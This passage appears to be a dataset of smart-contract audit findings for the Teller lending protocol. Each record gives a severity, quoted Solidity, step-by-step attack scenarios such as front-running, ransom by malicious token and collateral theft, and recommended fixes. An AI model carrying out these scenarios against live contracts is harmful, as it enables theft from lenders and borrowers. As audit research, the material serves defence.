_collateralInfo); <- @audit-issue never checks that loan isn't active\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n\\nCollateralManager#commitCollateral does not contain any check that the bidId is pending or at least that it isn't accepted. This means that collateral can be committed to an already accepted bid, modifying bidCollaterals.\\n```\\nfunction _withdraw(uint256 _bidId, address _receiver) internal virtual {\\n for (\\n uint256 i;\\n i < _bidCollaterals[_bidId].collateralAddresses.length();\\n i++\\n ) {\\n // Get collateral info\\n Collateral storage collateralInfo = _bidCollaterals[_bidId]\\n .collateralInfo[\\n _bidCollaterals[_bidId].collateralAddresses.at(i)\\n ];\\n // Withdraw collateral from escrow and send it to bid lender\\n ICollateralEscrowV1(_escrows[_bidId]).withdraw(\\n collateralInfo._collateralAddress,\\n collateralInfo._amount,\\n _receiver\\n );\\n```\\n\\nbidCollaterals is used to trigger the withdrawal from the escrow to the receiver, which closing the loan and liquidations. This can be used to DOS a loan AFTER it has already been filled.\\nUser A creates a bid for 10 ETH against 50,000 USDC at 10% APR\\nUser B sees this bid and decides to fill it\\nAfter the loan is accepted, User A calls CollateralManager#commitCollateral with a malicious token they create\\nUser A doesn't pay their loan and it becomes liquidatable\\nUser B calls liquidate but it reverts when the escrow attempts to transfer out the malicious token\\nUser A demands a ransom to return the funds\\nUser A enables the malicious token transfer once the ransom is paidчCollateralManager#commitCollateral should revert if loan is active.чLoans can be permanently DOS'd even after being acceptedч```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue never checks that loan isn't active\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n -CollateralManager#commitCollateral can be called by anyoneчhighчCollateralManager#commitCollateral has no access control allowing users to freely add malicious tokens to any bid\\nCollateralManager.sol#L117-L130\\n```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue no access control\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n\\nCollateralManager#commitCollateral has no access control and can be called by anyone on any bidID. This allows an attacker to front-run lenders and add malicious tokens to a loan right before it is filled.\\nA malicious user creates a malicious token that can be transferred once before being paused and returns uint256.max for balanceOf\\nUser A creates a loan for 10e18 ETH against 50,000e6 USDC at 10% APR\\nUser B decides to fill this loan and calls TellerV2#lenderAcceptBid\\nThe malicious user sees this and front-runs with a CollateralManager#commitCollateral call adding the malicious token\\nMalicious token is now paused breaking both liquidations and fully paying off the loan\\nMalicious user leverages this to ransom the locked tokens, unpausing when it is paidчCause CollateralManager#commitCollateral to revert if called by anyone other than the borrower, their approved forwarder or TellerV2чUser can add malicious collateral calls to any bid they wishч```\\nfunction commitCollateral(\\n uint256 _bidId,\\n Collateral[] calldata _collateralInfo\\n) public returns (bool validation_) {\\n address borrower = tellerV2.getLoanBorrower(_bidId);\\n (validation_, ) = checkBalances(borrower, _collateralInfo); <- @audit-issue no access control\\n\\n if (validation_) {\\n for (uint256 i; i < _collateralInfo.length; i++) {\\n Collateral memory info = _collateralInfo[i];\\n _commitCollateral(_bidId, info);\\n }\\n }\\n}\\n```\\n -CollateralManager#commitCollateral overwrites collateralInfo._amount if called with an existing collateralчhighчWhen duplicate collateral is committed, the collateral amount is overwritten with the new value. This allows borrowers to front-run bid acceptance to change their collateral and steal from lenders.\\nCollateralManager.sol#L426-L442\\n```\\nfunction _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; <- @audit-issue collateral info overwritten\\n emit CollateralCommitted(\\n _bidId,\\n _collateralInfo._collateralType,\\n _collateralInfo._collateralAddress,\\n _collateralInfo._amount,\\n _collateralInfo._tokenId\\n );\\n}\\n```\\n\\nWhen a duplicate collateral is committed it overwrites the collateralInfo for that token, which is used to determine how much collateral to escrow from the borrower.\\nTellerV2.sol#L470-L484\\n```\\nfunction lenderAcceptBid(uint256 _bidId)\\n external\\n override\\n pendingBid(_bidId, \"lenderAcceptBid\")\\n whenNotPaused\\n returns (\\n uint256 amountToProtocol,\\n uint256 amountToMarketplace,\\n uint256 amountToBorrower\\n )\\n{\\n // Retrieve bid\\n Bid storage bid = bids[_bidId];\\n\\n address sender = _msgSenderForMarket(bid.marketplaceId);\\n```\\n\\nTellerV2#lenderAcceptBid only allows the lender input the bidId of the bid they wish to accept, not allowing them to specify the expected collateral. This allows lenders to be honeypot and front-run causing massive loss of funds:\\nMalicious user creates and commits a bid to take a loan of 10e18 ETH against 100,000e6 USDC with 15% APR\\nLender sees this and calls TellerV2#lenderAcceptBid\\nMalicious user front-runs transaction with commitCollateral call setting USDC to 1\\nBid is filled sending malicious user 10e18 ETH and escrowing 1 USDC\\nAttacker doesn't repay loan and has stolen 10e18 ETH for the price of 1 USDCчAllow lender to specify collateral info and check that it matches the committed addresses and amountsчBid acceptance can be front-run to cause massive losses to lendersч```\\nfunction _commitCollateral(\\n uint256 _bidId,\\n Collateral memory _collateralInfo\\n) internal virtual {\\n CollateralInfo storage collateral = _bidCollaterals[_bidId];\\n collateral.collateralAddresses.add(_collateralInfo._collateralAddress);\\n collateral.collateralInfo[\\n _collateralInfo._collateralAddress\\n ] = _collateralInfo; <- @audit-issue collateral info overwritten\\n emit CollateralCommitted(\\n _bidId,\\n _collateralInfo._collateralType,\\n _collateralInfo._collateralAddress,\\n _collateralInfo._amount,\\n _collateralInfo._tokenId\\n );\\n}\\n```\\n -_repayLoan will fail if lender is blacklistedчhighчThe internal function that repays a loan `_repayLoan` attempts to transfer the loan token back to the lender. If the loan token implements a blacklist like the common USDC token, the transfer may be impossible and the repayment will fail.\\nThis internal `_repayLoan` function is called during any partial / full repayment and during liquidation.\\nThe function to repay the loan to the lender directly transfers the token to the lender:\\n```\\n function _repayLoan(// rest of code) internal virtual {\\n // rest of code\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n // rest of code\\n```\\n\\nAny of these functions will fail if loan lender is blacklisted by the token.\\nDuring repayment the loan lender is computed by:\\n```\\n function getLoanLender(uint256 _bidId)\\n public\\n view\\n returns (address lender_)\\n {\\n lender_ = bids[_bidId].lender;\\n\\n if (lender_ == address(lenderManager)) {\\n return lenderManager.ownerOf(_bidId);\\n }\\n }\\n```\\n\\nIf the lender controls a blacklisted address, they can use the lenderManager to selectively transfer the loan to / from the blacklisted whenever they want.чUse a push/pull pattern for transferring tokens. Allow repayment of loan and withdraw the tokens of the user into `TellerV2` (or an escrow) and allow lender to withdraw the repayment from `TellerV2` (or the escrow). This way, the repayment will fail only if `TellerV2` is blacklisted.чAny lender can prevent repayment of a loan and its liquidation. In particular, a lender can wait until a loan is almost completely repaid, transfer the loan to a blacklisted address (even one they do not control) to prevent the loan to be fully repaid / liquidated. The loan will default and borrower will not be able to withdraw their collateral.\\nThis result in a guaranteed griefing attack on the collateral of a user.\\nIf the lender controls a blacklisted address, they can additionally withdraw the collateral of the user.\\nI believe the impact is high since the griefing attack is always possible whenever lent token uses a blacklist, and results in a guaranteed loss of collateral.ч```\\n function _repayLoan(// rest of code) internal virtual {\\n // rest of code\\n bid.loanDetails.lendingToken.safeTransferFrom(\\n _msgSenderForMarket(bid.marketplaceId),\\n lender,\\n paymentAmount\\n );\\n // rest of code\\n```\\n -Malicious user can abuse UpdateCommitment to create commitments for other usersчhighчUpdateCommitment checks that the original lender is msg.sender but never validates that the original lender == new lender. This allows malicious users to effectively create a commitment for another user, allowing them to drain funds from them.\\nLenderCommitmentForwarder.sol#L208-L224\\n```\\nfunction updateCommitment(\\n uint256 _commitmentId,\\n Commitment calldata _commitment\\n) public commitmentLender(_commitmentId) { <- @audit-info checks that lender is msg.sender\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n \"Principal token address cannot be updated.\"\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n \"Market Id cannot be updated.\"\\n );\\n\\n commitments[_commitmentId] = _commitment; <- @audit-issue never checks _commitment.lender\\n\\n validateCommitment(commitments[_commitmentId]);\\n```\\n\\nUpdateCommitment is intended to allow users to update their commitment but due to lack of verification of _commitment.lender, a malicious user create a commitment then update it to a new lender. By using bad loan parameters they can steal funds from the attacker user.чCheck that the update lender is the same the original lenderчUpdateCommitment can be used to create a malicious commitment for another user and steal their fundsч```\\nfunction updateCommitment(\\n uint256 _commitmentId,\\n Commitment calldata _commitment\\n) public commitmentLender(_commitmentId) { <- @audit-info checks that lender is msg.sender\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n \"Principal token address cannot be updated.\"\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n \"Market Id cannot be updated.\"\\n );\\n\\n commitments[_commitmentId] = _commitment; <- @audit-issue never checks _commitment.lender\\n\\n validateCommitment(commitments[_commitmentId]);\\n```\\n -lender could be forced to withdraw collateral even if he/she would rather wait for liquidation during defaultчmediumчlender could be forced to withdraw collateral even if he/she would rather wait for liquidation during default\\nCollateralManager.withdraw would pass if the loan is defaulted (the borrower does not pay interest in time); in that case, anyone can trigger an withdrawal on behalf of the lender before the liquidation delay period passes.\\nwithdraw logic from CollateralManager.\\n```\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(\"WITHDRAW %d\", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) { audit\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId));\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(\"collateral cannot be withdrawn\");\\n }\\n }\\n```\\nчcheck that the caller is the lender\\n```\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(\"WITHDRAW %d\", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n+++ uint256 _marketplaceId = bidState.marketplaceId; \\n+++ address sender = _msgSenderForMarket(_marketplaceId); \\n+++ address lender = tellerV2.getLoanLender(_bidId); \\n+++ require(sender == lender, \"sender must be the lender\"); \\n _withdraw(_bidId, lender);\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(\"collateral cannot be withdrawn\");\\n }\\n }\\n```\\nчanyone can force lender to take up collateral during liquidation delay and liquidation could be something that never happen. This does not match the intention based on the spec which implies that lender has an option: `3) When the loan is fully repaid, the borrower can withdraw the collateral. If the loan becomes defaulted instead, then the lender has a 24 hour grace period to claim the collateral (losing the principal)`ч```\\n * @notice Withdraws deposited collateral from the created escrow of a bid that has been successfully repaid.\\n * @param _bidId The id of the bid to withdraw collateral for.\\n */\\n function withdraw(uint256 _bidId) external {\\n BidState bidState = tellerV2.getBidState(_bidId);\\n console2.log(\"WITHDRAW %d\", uint256(bidState));\\n if (bidState == BidState.PAID) {\\n _withdraw(_bidId, tellerV2.getLoanBorrower(_bidId));\\n } else if (tellerV2.isLoanDefaulted(_bidId)) { audit\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId));\\n emit CollateralClaimed(_bidId);\\n } else {\\n revert(\"collateral cannot be withdrawn\");\\n }\\n }\\n```\\n -The calculation time methods of `calculateNextDueDate` and `_canLiquidateLoan` are inconsistentчmediumчThe calculation time methods of `calculateNextDueDate` and `_canLiquidateLoan` are inconsistent\\n```\\nFile: TellerV2.sol\\n 854 function calculateNextDueDate(uint256 _bidId)\\n 855 public\\n 856 view\\n 857 returns (uint32 dueDate_)\\n 858 {\\n 859 Bid storage bid = bids[_bidId];\\n 860 if (bids[_bidId].state != BidState.ACCEPTED) return dueDate_;\\n 861\\n 862 uint32 lastRepaidTimestamp = lastRepaidTimestamp(_bidId);\\n 863\\n 864 // Calculate due date if payment cycle is set to monthly\\n 865 if (bidPaymentCycleType[_bidId] == PaymentCycleType.Monthly) {\\n 866 // Calculate the cycle number the last repayment was made\\n 867 uint256 lastPaymentCycle = BPBDTL.diffMonths(\\n 868 bid.loanDetails.acceptedTimestamp,\\n 869 \\n```\\n\\nThe `calculateNextDueDate` function is used by the borrower to query the date of the next repayment. Generally speaking, the borrower will think that as long as the repayment is completed at this point in time, the collateral will not be liquidated.\\n```\\nFile: TellerV2.sol\\n 953 function _canLiquidateLoan(uint256 _bidId, uint32 _liquidationDelay)\\n 954 internal\\n 955 view\\n 956 returns (bool)\\n 957 {\\n 958 Bid storage bid = bids[_bidId];\\n 959\\n 960 // Make sure loan cannot be liquidated if it is not active\\n 961 if (bid.state != BidState.ACCEPTED) return false;\\n 962\\n 963 if (bidDefaultDuration[_bidId] == 0) return false;\\n 964\\n 965 return (uint32(block.timestamp) -\\n 966 _liquidationDelay -\\n 967 lastRepaidTimestamp(_bidId) >\\n 968 bidDefaultDuration[_bidId]);\\n 969 }\\n```\\n\\nHowever, when the `_canLiquidateLoan` function actually judges whether it can be liquidated, the time calculation mechanism is completely different from that of `calculateNextDueDate` function, which may cause that if the time point calculated by `_canLiquidateLoan` is earlier than the time point of `calculateNextDueDate` function, the borrower may also be liquidated in the case of legal repayment.\\nBorrowers cannot query the specific liquidation time point, but can only query whether they can be liquidated through the `isLoanDefaulted` function or `isLoanLiquidateable` function. When they query that they can be liquidated, they may have already been liquidated.чIt is recommended to verify that the liquidation time point cannot be shorter than the repayment period and allow users to query the exact liquidation time point.чBorrowers may be liquidated if repayments are made on time.ч```\\nFile: TellerV2.sol\\n 854 function calculateNextDueDate(uint256 _bidId)\\n 855 public\\n 856 view\\n 857 returns (uint32 dueDate_)\\n 858 {\\n 859 Bid storage bid = bids[_bidId];\\n 860 if (bids[_bidId].state != BidState.ACCEPTED) return dueDate_;\\n 861\\n 862 uint32 lastRepaidTimestamp = lastRepaidTimestamp(_bidId);\\n 863\\n 864 // Calculate due date if payment cycle is set to monthly\\n 865 if (bidPaymentCycleType[_bidId] == PaymentCycleType.Monthly) {\\n 866 // Calculate the cycle number the last repayment was made\\n 867 uint256 lastPaymentCycle = BPBDTL.diffMonths(\\n 868 bid.loanDetails.acceptedTimestamp,\\n 869 \\n```\\n -updateCommitmentBorrowers does not delete all existing usersчmediumчThe lender can update the list of borrowers by calling `LenderCommitmentForwarder.updateCommitmentBorrowers`. The list of borrowers is EnumerableSetUpgradeable.AddressSet that is a complex structure containing mapping. Using the `delete` keyword to `delete` this structure will not erase the mapping inside it. Let's look at the code of this function.\\n```\\nmapping(uint256 => EnumerableSetUpgradeable.AddressSet)\\n internal commitmentBorrowersList;\\n \\nfunction updateCommitmentBorrowers(\\n uint256 _commitmentId,\\n address[] calldata _borrowerAddressList\\n ) public commitmentLender(_commitmentId) {\\n delete commitmentBorrowersList[_commitmentId];\\n _addBorrowersToCommitmentAllowlist(_commitmentId, _borrowerAddressList);\\n }\\n```\\n\\nI wrote a similar function to prove the problem.\\n```\\nusing EnumerableSet for EnumerableSet.AddressSet;\\n mapping(uint256 => EnumerableSet.AddressSet) internal users;\\n \\n function test_deleteEnumerableSet() public {\\n uint256 id = 1;\\n address[] memory newUsers = new address[](2);\\n newUsers[0] = address(0x1);\\n newUsers[1] = address(0x2);\\n\\n for (uint256 i = 0; i < newUsers.length; i++) {\\n users[id].add(newUsers[i]);\\n }\\n delete users[id];\\n newUsers[0] = address(0x3);\\n newUsers[1] = address(0x4);\\n for (uint256 i = 0; i < newUsers.length; i++) {\\n users[id].add(newUsers[i]);\\n }\\n bool exist = users[id].contains(address(0x1));\\n if(exist) {\\n emit log_string(\"address(0x1) exist\");\\n }\\n exist = users[id].contains(address(0x2));\\n if(exist) {\\n emit log_string(\"address(0x2) exist\");\\n }\\n }\\n/*\\n[PASS] test_deleteEnumerableSet() (gas: 174783)\\nLogs:\\n address(0x1) exist\\n address(0x2) exist\\n*/\\n```\\nчIn order to clean an `EnumerableSet`, you can either remove all elements one by one or create a fresh instance using an array of `EnumerableSet`.чThe deleted Users can still successfully call `LenderCommitmentForwarder.acceptCommitment` to get a loan.ч```\\nmapping(uint256 => EnumerableSetUpgradeable.AddressSet)\\n internal commitmentBorrowersList;\\n \\nfunction updateCommitmentBorrowers(\\n uint256 _commitmentId,\\n address[] calldata _borrowerAddressList\\n ) public commitmentLender(_commitmentId) {\\n delete commitmentBorrowersList[_commitmentId];\\n _addBorrowersToCommitmentAllowlist(_commitmentId, _borrowerAddressList);\\n }\\n```\\n -If the collateral is a fee-on-transfer token, repayment will be blockedчmediumчAs we all know, some tokens will deduct fees when transferring token. In this way, the actual amount of token received by the receiver will be less than the amount sent. If the collateral is this type of token, the amount of collateral recorded in the contract will bigger than the actual amount. When the borrower repays the loan, the amount of collateral withdrawn will be insufficient, causing tx revert.\\nThe `_bidCollaterals` mapping of `CollateralManager` records the `CollateralInfo` of each bidId. This structure records the collateral information provided by the user when creating a bid for a loan. A lender can accept a loan by calling `TellerV2.lenderAcceptBid` that will eventually transfer the user's collateral from the user address to the CollateralEscrowV1 contract corresponding to the loan. The whole process will deduct fee twice.\\n```\\n//CollateralManager.sol\\nfunction _deposit(uint256 _bidId, Collateral memory collateralInfo)\\n internal\\n virtual\\n {\\n // rest of code// rest of code\\n // Pull collateral from borrower & deposit into escrow\\n if (collateralInfo._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(collateralInfo._collateralAddress).transferFrom( //transferFrom first time\\n borrower,\\n address(this),\\n collateralInfo._amount\\n );\\n IERC20Upgradeable(collateralInfo._collateralAddress).approve(\\n escrowAddress,\\n collateralInfo._amount\\n );\\n collateralEscrow.depositAsset( //transferFrom second time\\n CollateralType.ERC20,\\n collateralInfo._collateralAddress,\\n collateralInfo._amount, //this value is from user's input\\n 0\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n\\nThe amount of collateral recorded by the CollateralEscrowV1 contract is equal to the amount originally submitted by the user.\\nWhen the borrower repays the loan, `collateralManager.withdraw` will be triggered. This function internally calls `CollateralEscrowV1.withdraw`. Since the balance of the collateral in the CollateralEscrowV1 contract is less than the amount to be withdrawn, the entire transaction reverts.\\n```\\n//CollateralEscrowV1.sol\\nfunction _withdrawCollateral(\\n Collateral memory _collateral,\\n address _collateralAddress,\\n uint256 _amount,\\n address _recipient\\n ) internal {\\n // Withdraw ERC20\\n if (_collateral._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(_collateralAddress).transfer( //revert\\n _recipient,\\n _collateral._amount //_collateral.balanceOf(address(this)) < _collateral._amount\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\nчTwo ways to fix this issue.\\nThe `afterBalance-beforeBalance` method should be used when recording the amount of collateral.\\n` --- a/teller-protocol-v2/packages/contracts/contracts/escrow/CollateralEscrowV1.sol\\n +++ b/teller-protocol-v2/packages/contracts/contracts/escrow/CollateralEscrowV1.sol\\n @@ -165,7 +165,7 @@ contract CollateralEscrowV1 is OwnableUpgradeable, ICollateralEscrowV1 {\\n if (_collateral._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(_collateralAddress).transfer(\\n _recipient,\\n - _collateral._amount\\n + IERC20Upgradeable(_collateralAddress).balanceOf(address(this))\\n );\\n }`чThe borrower's collateral is stuck in the instance of CollateralEscrowV1. Non-professional users will never know that they need to manually transfer some collateral into CollateralEscrowV1 to successfully repay.\\nThis issue blocked the user's repayment, causing the loan to be liquidated.\\nThe liquidator will not succeed by calling `TellerV2.liquidateLoanFull`.ч```\\n//CollateralManager.sol\\nfunction _deposit(uint256 _bidId, Collateral memory collateralInfo)\\n internal\\n virtual\\n {\\n // rest of code// rest of code\\n // Pull collateral from borrower & deposit into escrow\\n if (collateralInfo._collateralType == CollateralType.ERC20) {\\n IERC20Upgradeable(collateralInfo._collateralAddress).transferFrom( //transferFrom first time\\n borrower,\\n address(this),\\n collateralInfo._amount\\n );\\n IERC20Upgradeable(collateralInfo._collateralAddress).approve(\\n escrowAddress,\\n collateralInfo._amount\\n );\\n collateralEscrow.depositAsset( //transferFrom second time\\n CollateralType.ERC20,\\n collateralInfo._collateralAddress,\\n collateralInfo._amount, //this value is from user's input\\n 0\\n );\\n }\\n // rest of code// rest of code\\n }\\n```\\n -LenderCommitmentForwarder#updateCommitment can be front-run by malicious borrower to cause lender to over-commit fundsчmediumчThis is the same idea as approve vs increaseAlllowance. updateCommitment is a bit worse though because there are more reason why a user may wish to update their commitment (expiration, collateral ratio, interest rate, etc).\\nLenderCommitmentForwarder.sol#L212-L222\\n```\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n \"Principal token address cannot be updated.\"\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n \"Market Id cannot be updated.\"\\n );\\n\\n commitments[_commitmentId] = _commitment;\\n```\\n\\nLenderCommitmentForwarder#updateCommitment overwrites ALL of the commitment data. This means that even if a user is calling it to update even one value the maxPrincipal will reset, opening up the following attack vector:\\nUser A creates a commitment for 100e6 USDC lending against ETH\\nUser A's commitment is close to expiry so they call to update their commitment with a new expiration\\nUser B sees this update and front-runs it with a loan against the commitment for 100e6 USDC\\nUser A's commitment is updated and the amount is set back to 100e6 USDC\\nUser B takes out another loan for 100e6 USDC\\nUser A has now loaned out 200e6 USDC when they only meant to loan 100e6 USDCчCreate a function that allows users to extend expiry while keeping amount unchanged. Additionally create a function similar to increaseApproval which increase amount instead of overwriting amount.чCommitment is abused to over-commit lenderч```\\n require(\\n _commitment.principalTokenAddress ==\\n commitments[_commitmentId].principalTokenAddress,\\n \"Principal token address cannot be updated.\"\\n );\\n require(\\n _commitment.marketId == commitments[_commitmentId].marketId,\\n \"Market Id cannot be updated.\"\\n );\\n\\n commitments[_commitmentId] = _commitment;\\n```\\n -Bid submission vulnerable to market parameters changesчmediumчThe details for the audit state:\\nMarket owners should NOT be able to race-condition attack borrowers or lenders by changing market settings while bids are being submitted or accepted (while tx are in mempool). Care has been taken to ensure that this is not possible (similar in theory to sandwich attacking but worse as if possible it could cause unexpected and non-consentual interest rate on a loan) and further-auditing of this is welcome.\\nHowever, there is little protection in place to protect the submitter of a bid from changes in market parameters.\\nIn _submitBid(), certain bid parameters are taken from the marketRegistry:\\n```\\n function _submitBid(// rest of code)\\n // rest of code\\n (bid.terms.paymentCycle, bidPaymentCycleType[bidId]) = marketRegistry\\n .getPaymentCycle(_marketplaceId);\\n\\n bid.terms.APR = _APR;\\n\\n bidDefaultDuration[bidId] = marketRegistry.getPaymentDefaultDuration(\\n _marketplaceId\\n );\\n\\n bidExpirationTime[bidId] = marketRegistry.getBidExpirationTime(\\n _marketplaceId\\n );\\n\\n bid.paymentType = marketRegistry.getPaymentType(_marketplaceId);\\n \\n bid.terms.paymentCycleAmount = V2Calculations\\n .calculatePaymentCycleAmount(\\n bid.paymentType,\\n bidPaymentCycleType[bidId],\\n _principal,\\n _duration,\\n bid.terms.paymentCycle,\\n _APR\\n );\\n // rest of code\\n```\\nчTake every single parameters as input of `_submitBid()` (including fee percents) and compare them to the values in `marketRegistry` to make sure borrower agrees with them, revert if they differ.чIf market parameters are changed in between the borrower submitting a bid transaction and the transaction being applied, borrower may be subject to changes in `bidDefaultDuration`, `bidExpirationTime`, `paymentType`, `paymentCycle`, `bidPaymentCycleType` and `paymentCycleAmount`.\\nThat is, the user may be committed to the bid for longer / shorter than expected. They may have a longer / shorter default duration (time for the loan being considered defaulted / eligible for liquidation). They have un-provisioned for payment type and cycle parameters.\\nI believe most of this will have a medium impact on borrower (mild inconveniences / resolvable by directly repaying the loan) if the market owner is not evil and adapting the parameters reasonably.\\nAn evil market owner can set the value of `bidDefaultDuration` and `paymentCycle` very low (0) so that the loan will default immediately. It can then accept the bid, make user default immediately, and liquidate the loan to steal the user's collateral. This results in a loss of collateral for the borrower.ч```\\n function _submitBid(// rest of code)\\n // rest of code\\n (bid.terms.paymentCycle, bidPaymentCycleType[bidId]) = marketRegistry\\n .getPaymentCycle(_marketplaceId);\\n\\n bid.terms.APR = _APR;\\n\\n bidDefaultDuration[bidId] = marketRegistry.getPaymentDefaultDuration(\\n _marketplaceId\\n );\\n\\n bidExpirationTime[bidId] = marketRegistry.getBidExpirationTime(\\n _marketplaceId\\n );\\n\\n bid.paymentType = marketRegistry.getPaymentType(_marketplaceId);\\n \\n bid.terms.paymentCycleAmount = V2Calculations\\n .calculatePaymentCycleAmount(\\n bid.paymentType,\\n bidPaymentCycleType[bidId],\\n _principal,\\n _duration,\\n bid.terms.paymentCycle,\\n _APR\\n );\\n // rest of code\\n```\\n -EMI last payment not handled perfectly could lead to borrower losing collateralsчmediumчThe ternary logic of `calculateAmountOwed()` could have the last EMI payment under calculated, leading to borrower not paying the owed principal and possibly losing the collaterals if care has not been given to.\\nSupposing Bob has a loan duration of 100 days such that the payment cycle is evenly spread out, i.e payment due every 10 days, here is a typical scenario:\\nBob has been making his payment due on time to avoid getting marked delinquent. For the last payment due, Bob decides to make it 5 minutes earlier just to make sure he will not miss it.\\nHowever, `duePrincipal_` ends up assigned the minimum of `owedAmount - interest_` and `owedPrincipal_`, where the former is chosen since `oweTime` is less than _bid.terms.paymentCycle:\\n```\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n uint256 maxCycleOwed = isLastPaymentCycle\\n ? owedPrincipal_ + interest_\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount - interest_, owedPrincipal_);\\n }\\n```\\n\\nHence, in `_repayLoan()`, `paymentAmount >= _owedAmount` equals false failing to close the loan to have the collaterals returned to Bob:\\n```\\n if (paymentAmount >= _owedAmount) {\\n paymentAmount = _owedAmount;\\n bid.state = BidState.PAID;\\n\\n // Remove borrower's active bid\\n _borrowerBidsActive[bid.borrower].remove(_bidId);\\n\\n // If loan is is being liquidated and backed by collateral, withdraw and send to borrower\\n if (_shouldWithdrawCollateral) {\\n collateralManager.withdraw(_bidId);\\n }\\n\\n emit LoanRepaid(_bidId);\\n```\\n\\nWhile lingering and not paying too much attention to the collateral still in escrow, Bob presumes his loan is now settled.\\nNext, Alex the lender has been waiting for this golden opportunity and proceeds to calling `CollateralManager.withdraw()` to claim all collaterals as soon as the loan turns defaulted.чConsider refactoring the affected ternary logic as follows:\\n```\\n } else {\\n// Add the line below\\n duePrincipal = isLastPaymentCycle\\n// Add the line below\\n ? owedPrincipal\\n// Add the line below\\n : (_bid.terms.paymentCycleAmount * owedTime) / _bid.terms.paymentCycle;\\n\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n// Remove the line below\\n uint256 maxCycleOwed = isLastPaymentCycle\\n// Remove the line below\\n ? owedPrincipal_ // Add the line below\\n interest_\\n// Remove the line below\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n// Remove the line below\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n// Remove the line below\\n _bid.terms.paymentCycle;\\n// Remove the line below\\n duePrincipal_ = Math.min(owedAmount // Remove the line below\\n interest_, owedPrincipal_);\\n }\\n```\\nчBob ended up losing all collaterals for the sake of the minute amount of loan unpaid whereas Alex receives almost all principal plus interests on top of the collaterals.ч```\\n } else {\\n // Default to PaymentType.EMI\\n // Max payable amount in a cycle\\n // NOTE: the last cycle could have less than the calculated payment amount\\n uint256 maxCycleOwed = isLastPaymentCycle\\n ? owedPrincipal_ + interest_\\n : _bid.terms.paymentCycleAmount;\\n\\n // Calculate accrued amount due since last repayment\\n uint256 owedAmount = (maxCycleOwed * owedTime) /\\n _bid.terms.paymentCycle;\\n duePrincipal_ = Math.min(owedAmount - interest_, owedPrincipal_);\\n }\\n```\\n -defaulting doesn't change the state of the loanчmediumчThe lender can claim the borrowers collateral in case they have defaulted on their payments. This however does not change the state of the loan so the borrower can continue making payments to the lender even though the loan is defaulted.\\n```\\nFile: CollateralManager.sol\\n\\n } else if (tellerV2.isLoanDefaulted(_bidId)) {\\n _withdraw(_bidId, tellerV2.getLoanLender(_bidId)); // sends collateral to lender\\n emit CollateralClaimed(_bidId);\\n } else {\\n```\\n\\nSince this is in `CollateralManager` nothing is updating the state kept in `TellerV2` which will still be `ACCEPTED`. The lender could still make payments (in vain).чRemove the possibility for the lender to default the loan in `CollateralManager`. Move defaulting to `TellerV2` so it can properly close the loan.чThe borrower can continue paying unknowing that the loan is defaulted. The lender could, given a defaulted loan, see that the lender is trying to save their loan and front run the late payment with a seize of collateral. Then get both the late payment and the collateral. This is quite an unlikely scenario though.\\nThe loan will also be left active since even if the borrower pays the 